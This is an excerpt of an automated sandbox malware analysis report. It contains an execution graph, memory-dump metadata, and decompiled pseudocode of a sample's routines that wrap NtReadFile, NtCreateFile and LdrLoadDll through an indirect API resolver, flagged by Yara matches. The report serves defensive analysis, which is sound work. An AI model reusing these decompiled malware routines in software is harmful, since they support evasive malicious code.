                0x00eafdc3
                0x00eafdca
                0x00eafdd1
                0x00eafdd1
                0x00eafdd1
                0x00eafdd1
                0x00eafdd6
                0x00eafdd6
                0x00eafdd6
                0x00eafddd
                0x00eafd49
                0x00eafd4f
                0x00eafd52
                0x00eafd57
                0x00eafd5b
                0x00eafd5d
                0x00eafd5d
                0x00eafd5f
                0x00eaffda

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __lseeki64_nolock_free
                • String ID: G+$G+
                • API String ID: 1437703282-4250722411
                • Opcode ID: c192cf80ce0b87e66fd4274a2a165142f6be05c12f7b8259ec445665c6d1a3b0
                • Instruction ID: f7cc905273a8573437fafaf7d41ef350bb67400dcf1eb5e4cdd8aca58f21581c
                • Opcode Fuzzy Hash: c192cf80ce0b87e66fd4274a2a165142f6be05c12f7b8259ec445665c6d1a3b0
                • Instruction Fuzzy Hash: 02F0F62260020583CB214FE898413B96391BF8B324F742736E925BF1E0D33578818241
                Uniqueness

                Uniqueness Score: -1.00%

                Execution Graph

                Execution Coverage:5%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:4%
                Total number of Nodes:525
                Total number of Limit Nodes:70
                execution_graph 27912 41f0a0 27913 41f0ab 27912->27913 27915 41b940 27912->27915 27916 41b966 27915->27916 27923 409d40 27916->27923 27918 41b972 27919 41b993 27918->27919 27931 40c1c0 27918->27931 27919->27913 27921 41b985 27967 41a680 27921->27967 27971 409c90 27923->27971 27925 409d4d 27926 409d54 27925->27926 27983 409c30 27925->27983 27926->27918 27932 40c1e5 27931->27932 28383 40b1c0 27932->28383 27934 40c23c 28387 40ae40 27934->28387 27936 40c4b3 27936->27921 27937 40c262 27937->27936 28396 4143a0 27937->28396 27939 40c2a7 27939->27936 28399 408a60 27939->28399 27941 40c2eb 27941->27936 28406 41a4d0 27941->28406 27945 40c341 27946 40c348 27945->27946 28416 419fe0 27945->28416 27947 41bd90 2 API calls 27946->27947 27949 40c355 27947->27949 27949->27921 27951 40c392 27952 41bd90 2 API calls 27951->27952 27953 40c399 27952->27953 27953->27921 27954 40c3a2 27955 40f4a0 LdrLoadDll 27954->27955 27956 40c416 27955->27956 27956->27946 27957 40c421 27956->27957 27958 41bd90 2 API calls 27957->27958 27959 40c445 27958->27959 28419 41a030 27959->28419 27962 419fe0 LdrLoadDll 27963 40c480 27962->27963 27963->27936 28422 419df0 27963->28422 27966 41a680 2 API calls 27966->27936 27968 41af30 LdrLoadDll 27967->27968 27969 41a69f ExitProcess 27968->27969 28002 418b90 27971->28002 27975 409cb6 27975->27925 27976 409cac 27976->27975 28009 41b280 27976->28009 27978 409cf3 27978->27975 28020 409ab0 27978->28020 27980 409d13 28026 409620 LdrLoadDll 27980->28026 27982 409d25 27982->27925 27984 409c4a 27983->27984 27985 41b570 LdrLoadDll 27983->27985 28361 41b570 27984->28361 27985->27984 27988 41b570 LdrLoadDll 27989 409c71 27988->27989 27990 40f180 27989->27990 27991 40f199 27990->27991 28369 40b040 27991->28369 27993 40f1ac 28373 41a1b0 27993->28373 27997 40f1fd 27999 41a460 2 API calls 27997->27999 27998 40f1d2 27998->27997 28379 41a230 27998->28379 28000 409d65 27999->28000 28000->27918 28003 418b9f 28002->28003 28027 414e50 28003->28027 28005 409ca3 28006 418a40 28005->28006 28033 41a5d0 28006->28033 28010 41b299 28009->28010 28040 414a50 28010->28040 28012 41b2b1 28013 41b2ba 28012->28013 28079 41b0c0 28012->28079 28013->27978 28015 41b2ce 28015->28013 28097 419ed0 28015->28097 28023 409aca 28020->28023 28342 407ea0 28020->28342 28022 409ad1 28022->27980 28023->28022 28355 408160 28023->28355 28026->27982 28028 414e5e 28027->28028 28029 414e6a 28027->28029 28028->28029 28032 4152d0 LdrLoadDll 28028->28032 28029->28005 28031 414fbc 28031->28005 28032->28031 28036 41af30 28033->28036 28035 418a55 28035->27976 28037 41af40 28036->28037 28039 41af62 28036->28039 28038 414e50 LdrLoadDll 28037->28038 28038->28039 28039->28035 28041 414d85 28040->28041 28051 414a64 28040->28051 28041->28012 28043 414b44 28044 414b90 28043->28044 28045 414b73 28043->28045 28049 414b7d 28043->28049 28108 41a330 28044->28108 28165 41a430 LdrLoadDll 28045->28165 28048 414bb7 28050 41bd90 2 API calls 28048->28050 28049->28012 28052 414bc3 28050->28052 28051->28041 28103 419c20 28051->28103 28052->28049 28053 414d49 28052->28053 28054 414d5f 28052->28054 28059 414c52 28052->28059 28055 41a460 2 API calls 28053->28055 28174 414790 LdrLoadDll NtReadFile NtClose 28054->28174 28057 414d50 28055->28057 28057->28012 28058 414d72 28058->28012 28060 414cb9 28059->28060 28062 414c61 28059->28062 28060->28053 28061 414ccc 28060->28061 28167 41a2b0 28061->28167 28064 414c66 28062->28064 28065 414c7a 28062->28065 28166 414650 LdrLoadDll NtClose 28064->28166 28068 414c97 28065->28068 28069 414c7f 28065->28069 28068->28057 28124 414410 28068->28124 28112 4146f0 28069->28112 28071 414c70 28071->28012 28074 414d2c 28171 41a460 28074->28171 28075 414c8d 28075->28012 28076 414caf 28076->28012 28078 414d38 28078->28012 28080 41b0d1 28079->28080 28081 41b0e3 28080->28081 28193 41bd10 28080->28193 28081->28015 28083 41b104 28196 414070 28083->28196 28085 41b150 28085->28015 28086 41b127 28086->28085 28087 414070 3 API calls 28086->28087 28088 41b149 28087->28088 28088->28085 28221 415390 28088->28221 28090 41b1da 28091 41b1ea 28090->28091 28313 41aed0 LdrLoadDll 28090->28313 28231 41ad40 28091->28231 28094 41b218 28310 419e90 28094->28310 28098 41af30 LdrLoadDll 28097->28098 28099 419eec 28098->28099 28100 41bd90 28099->28100 28101 41b329 28100->28101 28339 41a640 28100->28339 28101->27978 28104 41af30 LdrLoadDll 28103->28104 28105 419c3c 28103->28105 28104->28105 28105->28043 28106 41af30 LdrLoadDll 28105->28106 28107 419c7c 28106->28107 28107->28043 28109 41a336 28108->28109 28110 41af30 LdrLoadDll 28109->28110 28111 41a34c NtCreateFile 28110->28111 28111->28048 28113 41470c 28112->28113 28114 41a2b0 LdrLoadDll 28113->28114 28115 41472d 28114->28115 28116 414734 28115->28116 28117 414748 28115->28117 28118 41a460 2 API calls 28116->28118 28119 41a460 2 API calls 28117->28119 28120 41473d 28118->28120 28121 414751 28119->28121 28120->28075 28175 41bfa0 LdrLoadDll RtlAllocateHeap 28121->28175 28123 41475c 28123->28075 28125 41445b 28124->28125 28126 41448e 28124->28126 28128 41a2b0 LdrLoadDll 28125->28128 28127 4145d9 28126->28127 28131 4144aa 28126->28131 28129 41a2b0 LdrLoadDll 28127->28129 28130 414472 28128->28130 28136 4145f4 28129->28136 28132 41a460 2 API calls 28130->28132 28133 41a2b0 LdrLoadDll 28131->28133 28134 41447b 28132->28134 28135 4144c5 28133->28135 28134->28076 28138 4144e1 28135->28138 28139 4144cc 28135->28139 28189 41a2f0 LdrLoadDll 28136->28189 28142 4144e6 28138->28142 28143 4144fc 28138->28143 28141 41a460 2 API calls 28139->28141 28140 41462e 28144 41a460 2 API calls 28140->28144 28141->28134 28145 41a460 2 API calls 28142->28145 28151 414501 28143->28151 28176 41bf60 28143->28176 28146 414639 28144->28146 28147 4144ef 28145->28147 28146->28076 28147->28076 28150 414567 28152 41457e 28150->28152 28188 41a270 LdrLoadDll 28150->28188 28158 414513 28151->28158 28180 41a3e0 28151->28180 28154 414585 28152->28154 28155 41459a 28152->28155 28156 41a460 2 API calls 28154->28156 28157 41a460 2 API calls 28155->28157 28156->28158 28159 4145a3 28157->28159 28158->28076 28160 4145cf 28159->28160 28183 41bb60 28159->28183 28160->28076 28162 4145ba 28163 41bd90 2 API calls 28162->28163 28164 4145c3 28163->28164 28164->28076 28165->28049 28166->28071 28168 414d14 28167->28168 28169 41af30 LdrLoadDll 28167->28169 28170 41a2f0 LdrLoadDll 28168->28170 28169->28168 28170->28074 28172 41a47c NtClose 28171->28172 28173 41af30 LdrLoadDll 28171->28173 28172->28078 28173->28172 28174->28058 28175->28123 28177 41bf72 28176->28177 28190 41a600 28177->28190 28179 41bf78 28179->28151 28181 41a3fc NtReadFile 28180->28181 28182 41af30 LdrLoadDll 28180->28182 28181->28150 28182->28181 28184 41bb84 28183->28184 28185 41bb6d 28183->28185 28184->28162 28185->28184 28186 41bf60 2 API calls 28185->28186 28187 41bb9b 28186->28187 28187->28162 28188->28152 28189->28140 28191 41af30 LdrLoadDll 28190->28191 28192 41a61c RtlAllocateHeap 28191->28192 28192->28179 28194 41bd3d 28193->28194 28314 41a510 28193->28314 28194->28083 28197 414081 28196->28197 28199 414089 28196->28199 28197->28086 28198 41435c 28198->28086 28199->28198 28317 41cf00 28199->28317 28201 4140dd 28202 41cf00 2 API calls 28201->28202 28206 4140e8 28202->28206 28203 414136 28205 41cf00 2 API calls 28203->28205 28208 41414a 28205->28208 28206->28203 28322 41cfa0 28206->28322 28207 41cf00 2 API calls 28210 4141bd 28207->28210 28208->28207 28209 41cf00 2 API calls 28218 414205 28209->28218 28210->28209 28212 414334 28329 41cf60 LdrLoadDll RtlFreeHeap 28212->28329 28214 41433e 28330 41cf60 LdrLoadDll RtlFreeHeap 28214->28330 28216 414348 28331 41cf60 LdrLoadDll RtlFreeHeap 28216->28331 28328 41cf60 LdrLoadDll RtlFreeHeap 28218->28328 28219 414352 28332 41cf60 LdrLoadDll RtlFreeHeap 28219->28332 28222 4153a1 28221->28222 28223 414a50 6 API calls 28222->28223 28224 4153b7 28223->28224 28225 4153f2 28224->28225 28226 415405 28224->28226 28230 41540a 28224->28230 28227 41bd90 2 API calls 28225->28227 28228 41bd90 2 API calls 28226->28228 28229 4153f7 28227->28229 28228->28230 28229->28090 28230->28090 28333 41ac00 28231->28333 28234 41ac00 LdrLoadDll 28235 41ad5d 28234->28235 28236 41ac00 LdrLoadDll 28235->28236 28237 41ad66 28236->28237 28238 41ac00 LdrLoadDll 28237->28238 28239 41ad6f 28238->28239 28240 41ac00 LdrLoadDll 28239->28240 28241 41ad78 28240->28241 28242 41ac00 LdrLoadDll 28241->28242 28243 41ad81 28242->28243 28244 41ac00 LdrLoadDll 28243->28244 28245 41ad8d 28244->28245 28246 41ac00 LdrLoadDll 28245->28246 28247 41ad96 28246->28247 28248 41ac00 LdrLoadDll 28247->28248 28249 41ad9f 28248->28249 28250 41ac00 LdrLoadDll 28249->28250 28251 41ada8 28250->28251 28252 41ac00 LdrLoadDll 28251->28252 28253 41adb1 28252->28253 28254 41ac00 LdrLoadDll 28253->28254 28255 41adba 28254->28255 28256 41ac00 LdrLoadDll 28255->28256 28257 41adc6 28256->28257 28258 41ac00 LdrLoadDll 28257->28258 28259 41adcf 28258->28259 28260 41ac00 LdrLoadDll 28259->28260 28261 41add8 28260->28261 28262 41ac00 LdrLoadDll 28261->28262 28263 41ade1 28262->28263 28264 41ac00 LdrLoadDll 28263->28264 28265 41adea 28264->28265 28266 41ac00 LdrLoadDll 28265->28266 28267 41adf3 28266->28267 28268 41ac00 LdrLoadDll 28267->28268 28269 41adff 28268->28269 28270 41ac00 LdrLoadDll 28269->28270 28271 41ae08 28270->28271 28272 41ac00 LdrLoadDll 28271->28272 28273 41ae11 28272->28273 28274 41ac00 LdrLoadDll 28273->28274 28275 41ae1a 28274->28275 28276 41ac00 LdrLoadDll 28275->28276 28277 41ae23 28276->28277 28278 41ac00 LdrLoadDll 28277->28278 28279 41ae2c 28278->28279 28280 41ac00 LdrLoadDll 28279->28280 28281 41ae38 28280->28281 28282 41ac00 LdrLoadDll 28281->28282 28283 41ae41 28282->28283 28284 41ac00 LdrLoadDll 28283->28284 28285 41ae4a 28284->28285 28286 41ac00 LdrLoadDll 28285->28286 28287 41ae53 28286->28287 28288 41ac00 LdrLoadDll 28287->28288 28289 41ae5c 28288->28289 28290 41ac00 LdrLoadDll 28289->28290 28291 41ae65 28290->28291 28292 41ac00 LdrLoadDll 28291->28292 28293 41ae71 28292->28293 28294 41ac00 LdrLoadDll 28293->28294 28295 41ae7a 28294->28295 28296 41ac00 LdrLoadDll 28295->28296 28297 41ae83 28296->28297 28298 41ac00 LdrLoadDll 28297->28298 28299 41ae8c 28298->28299 28300 41ac00 LdrLoadDll 28299->28300 28301 41ae95 28300->28301 28302 41ac00 LdrLoadDll 28301->28302 28303 41ae9e 28302->28303 28304 41ac00 LdrLoadDll 28303->28304 28305 41aeaa 28304->28305 28306 41ac00 LdrLoadDll 28305->28306 28307 41aeb3 28306->28307 28308 41ac00 LdrLoadDll 28307->28308 28309 41aebc 28308->28309 28309->28094 28311 41af30 LdrLoadDll 28310->28311 28312 419eac 28311->28312 28312->28015 28313->28091 28315 41af30 LdrLoadDll 28314->28315 28316 41a52c NtAllocateVirtualMemory 28315->28316 28316->28194 28318 41cf10 28317->28318 28319 41cf16 28317->28319 28318->28201 28320 41bf60 2 API calls 28319->28320 28321 41cf3c 28319->28321 28320->28321 28321->28201 28323 41cfc5 28322->28323 28324 41cffd 28322->28324 28325 41bf60 2 API calls 28323->28325 28324->28206 28326 41cfda 28325->28326 28327 41bd90 2 API calls 28326->28327 28327->28324 28328->28212 28329->28214 28330->28216 28331->28219 28332->28198 28334 41ac1b 28333->28334 28335 414e50 LdrLoadDll 28334->28335 28336 41ac3b 28335->28336 28337 414e50 LdrLoadDll 28336->28337 28338 41ace7 28336->28338 28337->28338 28338->28234 28340 41af30 LdrLoadDll 28339->28340 28341 41a65c RtlFreeHeap 28340->28341 28341->28101 28343 407eb0 28342->28343 28344 407eab 28342->28344 28345 41bd10 2 API calls 28343->28345 28344->28023 28351 407ed5 28345->28351 28346 407f38 28346->28023 28347 419e90 LdrLoadDll 28347->28351 28348 407f3e 28350 407f64 28348->28350 28352 41a590 LdrLoadDll 28348->28352 28350->28023 28351->28346 28351->28347 28351->28348 28353 41bd10 2 API calls 28351->28353 28358 41a590 28351->28358 28354 407f55 28352->28354 28353->28351 28354->28023 28356 40817e 28355->28356 28357 41a590 LdrLoadDll 28355->28357 28356->27980 28357->28356 28359 41a5ac 28358->28359 28360 41af30 LdrLoadDll 28358->28360 28359->28351 28360->28359 28362 41b593 28361->28362 28365 40acf0 28362->28365 28366 40ad14 28365->28366 28367 40ad50 LdrLoadDll 28366->28367 28368 409c5b 28366->28368 28367->28368 28368->27988 28370 40b063 28369->28370 28372 40b0e0 28370->28372 28382 419c60 LdrLoadDll 28370->28382 28372->27993 28374 41af30 LdrLoadDll 28373->28374 28375 40f1bb 28374->28375 28375->28000 28376 41a7a0 28375->28376 28377 41af30 LdrLoadDll 28376->28377 28378 41a7bf LookupPrivilegeValueW 28377->28378 28378->27998 28380 41a24c 28379->28380 28381 41af30 LdrLoadDll 28379->28381 28380->27997 28381->28380 28382->28372 28384 40b1f0 28383->28384 28385 40b040 LdrLoadDll 28384->28385 28386 40b204 28385->28386 28386->27934 28388 40ae51 28387->28388 28389 40ae4d 28387->28389 28390 40ae6a 28388->28390 28391 40ae9c 28388->28391 28389->27937 28425 419ca0 LdrLoadDll 28390->28425 28426 419ca0 LdrLoadDll 28391->28426 28393 40aead 28393->27937 28395 40ae8c 28395->27937 28397 40f4a0 LdrLoadDll 28396->28397 28398 4143c6 28397->28398 28398->27939 28427 4087a0 28399->28427 28402 4087a0 8 API calls 28403 408a8a 28402->28403 28405 408a9d 28403->28405 28445 40f710 6 API calls 28403->28445 28405->27941 28407 41af30 LdrLoadDll 28406->28407 28408 40c322 28407->28408 28409 40f4a0 28408->28409 28410 40f4bd 28409->28410 28555 419f90 28410->28555 28413 40f505 28413->27945 28414 419fe0 LdrLoadDll 28415 40f52e 28414->28415 28415->27945 28417 40c385 28416->28417 28418 41af30 LdrLoadDll 28416->28418 28417->27951 28417->27954 28418->28417 28420 41af30 LdrLoadDll 28419->28420 28421 40c459 28420->28421 28421->27962 28423 41af30 LdrLoadDll 28422->28423 28424 40c4ac 28423->28424 28424->27966 28425->28395 28426->28393 28428 407ea0 2 API calls 28427->28428 28443 4087ba 28427->28443 28428->28443 28429 408a49 28429->28402 28429->28405 28430 408a3f 28431 408160 LdrLoadDll 28430->28431 28431->28429 28434 419ed0 LdrLoadDll 28434->28443 28436 41a460 LdrLoadDll NtClose 28436->28443 28439 40c4c0 LdrLoadDll NtClose 28439->28443 28442 419df0 LdrLoadDll 28442->28443 28443->28429 28443->28430 28443->28434 28443->28436 28443->28439 28443->28442 28446 419ce0 28443->28446 28449 4085d0 28443->28449 28461 40f5f0 LdrLoadDll NtClose 28443->28461 28462 419d60 LdrLoadDll 28443->28462 28463 419d90 LdrLoadDll 28443->28463 28464 419e20 LdrLoadDll 28443->28464 28465 4083a0 28443->28465 28481 405f60 LdrLoadDll 28443->28481 28445->28405 28447 41af30 LdrLoadDll 28446->28447 28448 419cfc 28447->28448 28448->28443 28450 4085e6 28449->28450 28482 419850 28450->28482 28452 408771 28452->28443 28453 4085ff 28453->28452 28503 4081a0 28453->28503 28455 4086e5 28455->28452 28456 4083a0 7 API calls 28455->28456 28457 408713 28456->28457 28457->28452 28458 419ed0 LdrLoadDll 28457->28458 28459 408748 28458->28459 28459->28452 28460 41a4d0 LdrLoadDll 28459->28460 28460->28452 28461->28443 28462->28443 28463->28443 28464->28443 28466 4083c9 28465->28466 28537 408310 28466->28537 28469 41a4d0 LdrLoadDll 28470 4083dc 28469->28470 28470->28469 28471 408467 28470->28471 28473 408462 28470->28473 28545 40f670 28470->28545 28471->28443 28472 41a460 2 API calls 28474 40849a 28472->28474 28473->28472 28474->28471 28475 419ce0 LdrLoadDll 28474->28475 28476 4084ff 28475->28476 28476->28471 28549 419d20 28476->28549 28478 408563 28478->28471 28479 414a50 6 API calls 28478->28479 28480 4085b8 28479->28480 28480->28443 28481->28443 28483 41bf60 2 API calls 28482->28483 28484 419867 28483->28484 28510 409310 28484->28510 28486 419882 28487 4198c0 28486->28487 28488 4198a9 28486->28488 28491 41bd10 2 API calls 28487->28491 28489 41bd90 2 API calls 28488->28489 28490 4198b6 28489->28490 28490->28453 28492 4198fa 28491->28492 28493 41bd10 2 API calls 28492->28493 28494 419913 28493->28494 28500 419bb4 28494->28500 28516 41bd50 28494->28516 28497 419ba0 28498 41bd90 2 API calls 28497->28498 28499 419baa 28498->28499 28499->28453 28501 41bd90 2 API calls 28500->28501 28502 419c09 28501->28502 28502->28453 28504 40829f 28503->28504 28506 4081b5 28503->28506 28504->28455 28505 414a50 6 API calls 28507 408222 28505->28507 28506->28504 28506->28505 28508 41bd90 2 API calls 28507->28508 28509 408249 28507->28509 28508->28509 28509->28455 28511 409335 28510->28511 28512 40acf0 LdrLoadDll 28511->28512 28513 409368 28512->28513 28515 40938d 28513->28515 28519 40cf20 28513->28519 28515->28486 28534 41a550 28516->28534 28520 40cf4c 28519->28520 28521 41a1b0 LdrLoadDll 28520->28521 28522 40cf65 28521->28522 28523 40cf6c 28522->28523 28530 41a1f0 28522->28530 28523->28515 28527 40cfa7 28528 41a460 2 API calls 28527->28528 28529 40cfca 28528->28529 28529->28515 28531 40cf8f 28530->28531 28532 41af30 LdrLoadDll 28530->28532 28531->28523 28533 41a7e0 LdrLoadDll 28531->28533 28532->28531 28533->28527 28535 41af30 LdrLoadDll 28534->28535 28536 419b99 28535->28536 28536->28497 28536->28500 28538 408328 28537->28538 28539 40acf0 LdrLoadDll 28538->28539 28540 408343 28539->28540 28541 414e50 LdrLoadDll 28540->28541 28542 408353 28541->28542 28543 40835c PostThreadMessageW 28542->28543 28544 408370 28542->28544 28543->28544 28544->28470 28546 40f683 28545->28546 28552 419e60 28546->28552 28550 419d3c 28549->28550 28551 41af30 LdrLoadDll 28549->28551 28550->28478 28551->28550 28553 40f6ae 28552->28553 28554 41af30 LdrLoadDll 28552->28554 28553->28470 28554->28553 28556 40f4fe 28555->28556 28557 41af30 LdrLoadDll 28555->28557 28556->28413 28556->28414 28557->28556

                Executed Functions

                Function 0041A3DB Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 41a3db-41a429 call 41af30 NtReadFile
                C-Code - Quality: 37%
                			E0041A3DB(void* __eax, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t22;
				void* _t31;
				intOrPtr* _t34;
				void* _t36;

				_t17 = _a4;
				_t34 = _a4 + 0xc48;
				E0041AF30(_t31, _t17, _t34,  *((intOrPtr*)(_t17 + 0x10)), 0, 0x2a);
				_t5 =  &_a40; // 0x414a31
				_t7 =  &_a32; // 0x414d72
				_t13 =  &_a8; // 0x414d72
				_t22 =  *((intOrPtr*)( *_t34))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, __eax, _t36); // executed
				return _t22;
			}







                0x0041a3e3
                0x0041a3ef
                0x0041a3f7
                0x0041a3fc
                0x0041a402
                0x0041a41d
                0x0041a425
                0x0041a429

                APIs
                • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID: 1JA$rMA$rMA
                • API String ID: 2738559852-782607585
                • Opcode ID: 291b86b8802e1d868af88200425f00ab3a93119074edc7eaed9192bf387fb66a
                • Instruction ID: 7d0f0e3da2b30e1873058eb867fd0635cb8da2a31fb7a424639a84f96df8dbb8
                • Opcode Fuzzy Hash: 291b86b8802e1d868af88200425f00ab3a93119074edc7eaed9192bf387fb66a
                • Instruction Fuzzy Hash: 27F0E2B2210108ABCB04DF89CC80EEB77ADAF8C714F058249BA0D97241C630E811CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A3E0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 3 41a3e0-41a3f6 4 41a3fc-41a429 NtReadFile 3->4 5 41a3f7 call 41af30 3->5 5->4
                C-Code - Quality: 37%
                			E0041A3E0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF30(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                0x0041a3e3
                0x0041a3ef
                0x0041a3f7
                0x0041a3fc
                0x0041a402
                0x0041a41d
                0x0041a425
                0x0041a429

                APIs
                • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID: 1JA$rMA$rMA
                • API String ID: 2738559852-782607585
                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                • Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                • Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 219 40acf0-40ad19 call 41cc20 222 40ad1b-40ad1e 219->222 223 40ad1f-40ad2d call 41d040 219->223 226 40ad3d-40ad4e call 41b470 223->226 227 40ad2f-40ad3a call 41d2c0 223->227 232 40ad50-40ad64 LdrLoadDll 226->232 233 40ad67-40ad6a 226->233 227->226 232->233
                C-Code - Quality: 100%
                			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC20( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D040(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2C0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B470(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                0x0040ad0c
                0x0040ad0f
                0x0040ad14
                0x0040ad19
                0x0040ad23
                0x0040ad28
                0x0040ad2b
                0x0040ad2d
                0x0040ad35
                0x0040ad3a
                0x0040ad3a
                0x0040ad41
                0x0040ad49
                0x0040ad4c
                0x0040ad4e
                0x0040ad62
                0x00000000
                0x0040ad64
                0x0040ad6a
                0x0040ad1e
                0x0040ad1e
                0x0040ad1e

                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                • Instruction ID: 667dcf47c4413345b20473d406be44d3d8b7ebea9a3b2269cd40777f9644ce6e
                • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                • Instruction Fuzzy Hash: 79015EB5D0020DBBDB10EBA1DC42FDEB3799F54308F0045AAA908A7281F638EB54CB95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0041A32A Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 234 41a32a-41a381 call 41af30 NtCreateFile
                C-Code - Quality: 64%
                			E0041A32A(void* __eax, void* __ebx, void* __ecx) {
				long _t20;
				void* _t33;
				void* _t37;

				_t14 = __eax;
				_push(__eax);
				asm("cmpsd");
				_t2 = _t14 + 0xc40; // 0xc40
				E0041AF30(_t33, __eax, _t2,  *((intOrPtr*)(__eax + 0x10)), 0, 0x28);
				_t20 = NtCreateFile( *(_t37 + 0xc),  *(_t37 + 0x10),  *(_t37 + 0x14),  *(_t37 + 0x18),  *(_t37 + 0x1c),  *(_t37 + 0x20),  *(_t37 + 0x24),  *(_t37 + 0x28),  *(_t37 + 0x2c),  *(_t37 + 0x30),  *(_t37 + 0x34)); // executed
				return _t20;
			}






                0x0041a32a
                0x0041a32a
                0x0041a32d
                0x0041a33f
                0x0041a347
                0x0041a37d
                0x0041a381

                APIs
                • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                Memory Dump Source
                • Source File: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_zrztlh.jbxd
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: e2ba16ba97907cb79b36fad112c88b6bc11b3647f296aafa029722d4b6a74a8f
                • Instruction ID: 8c1b4d357b314ee3ffb4b8eb0307ab4e303c37b1b4fdb4d305810e8d8fab50f6
                • Opcode Fuzzy Hash: e2ba16ba97907cb79b36fad112c88b6bc11b3647f296aafa029722d4b6a74a8f
                • Instruction Fuzzy Hash: 72F0C4B2215108AFCB48CF98DD95EEB33ADAF8C314F15824DBA1D97241C630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

